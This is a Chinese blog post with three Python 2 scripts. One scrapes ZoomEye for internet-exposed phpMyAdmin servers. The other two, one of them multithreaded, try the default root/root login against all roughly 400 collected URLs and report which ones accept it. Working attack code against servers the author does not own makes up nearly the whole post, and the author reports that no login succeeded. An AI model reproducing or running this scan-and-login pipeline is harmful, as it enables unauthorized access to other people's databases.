钟馗之眼python爬取

正文:

怎么说呢,这个网站用python爬虫爬取会存在误差,供研究够了
主要是收集的两个ip提取器由于前几天的钟馗之眼更新无法使用了,就想着自己写个吧
1.
urls_get.py(抓包自己改header头,博主把自己的cookie删了)
获取了phpmyadmin,存在爬取问题,只拿了400个url(暂未解决)
爬取其他修改url参数

#!/usr/bin/env python
# coding=utf-8
import requests
import json
import codecs
import time
import sys
from bs4 import BeautifulSoup
from lxml import html
reload(sys)
sys.setdefaultencoding('utf-8')
import random
headers={
'Host': 'www.zoomeye.org',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
result=[]
print "Start : %s" % time.ctime()
for i in range(1,100):
	try:
		url='https://www.zoomeye.org/search?q=app:"phpMyAdmin"&p='+str(i)
		r = requests.get(url =url,headers=headers)
		res=json.loads(r.text)
		for x in res["matches"]:
			a=x["webapp"][0]["url"]
			print a
			result.append(a)
	except Exception as e:
		print i
	time.sleep(random.randint(20,40))
s = '\n'.join(result)
with codecs.open("phpmyadmin_urls.txt","w+") as f:
	f.write(s)
print "End : %s" % time.ctime()

 
2.
check_url.py(很简单,检测了root root默认密码)

#!/usr/bin/env python
# coding=utf-8
import requests
import json
import codecs
import time
import sys
from bs4 import BeautifulSoup
from lxml import html
reload(sys)
sys.setdefaultencoding('utf-8')
result=range(400)
m=0
can_list=[]
with codecs.open('phpmyadmin_urls.txt','r') as f:
	for line in f.readlines():
		result[m]=(line.strip('\n/\r'))
		m=m+1
#print result
f.close()
for url in result[0:]:
	try:
		url=url+"/index.php"
		headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
		payload = {'pma_username': 'root', 'pma_password': 'root'}
		r = requests.post(url=url, headers = headers, data = payload,verify=False)
		if 'phpMyAdmin is more friendly with a' in r.content:
			print "ok:"+url
		else:
			print url
	except Exception as e:
		continue
'''
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
def get_token(url):
	response=requests.get(url,headers=headers)
url="http://192.168.225.134/phpmyadmin/index.php"
payload = {'pma_username': 'root', 'pma_password': 'root'}
r = requests.post(url=url, headers = headers, data = payload)
#print r.text
if "phpMyAdmin is more friendly with a" in r.text:
	print "ok:"+url
'''

 
3.
多线程实现
参考:https://www.cnblogs.com/huangguifeng/p/7632799.html(文中还有多进程思路)

#!/usr/bin/env python2
# -*- coding=utf-8 -*-
from threading import Thread
from Queue import Queue
import requests
import json
import codecs
import time
import sys
from bs4 import BeautifulSoup
from lxml import html
reload(sys)
sys.setdefaultencoding('utf-8')
import random
class DouBanSpider(Thread):
	def __init__(self, url, q):
		# 重写写父类的__init__方法
		super(DouBanSpider, self).__init__()
		self.url = url+"/index.php"
		self.q = q
		self.headers ={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
		self.payload = {'pma_username': 'root', 'pma_password': 'root'}
	def run(self):
		r = requests.post(url=self.url, headers = self.headers, data = self.payload,verify=False)
		if 'phpMyAdmin is more friendly with a' in r.content:
			print "ok:"+self.url
			self.q.put(self.url)
		else:
			print self.url
def main():
	# 创建一个队列用来保存进程获取到的数据
	q = Queue()
	# 保存线程
	Thread_list = []
	# 创建并启动线程
	result=[]
	with codecs.open('phpmyadmin_urls.txt','r') as f:
		for line in f.readlines():
			result.append(line.strip('\n/\r'))
	for url in result[0:]:
		p = DouBanSpider(url,q)
		p.start()
		Thread_list.append(p)
	# 让主线程等待子线程执行完成
	for i in Thread_list:
		i.join()
	while not q.empty():
		print "class ok:"+q.get()
if __name__=="__main__":
	start = time.time()
	main()
	print "u'[info]耗时:%s'"%(time.time()-start)

 
测试结果是没有一个使用默认密码
 
2018.11.1

发表评论

电子邮件地址不会被公开。 必填项已用*标注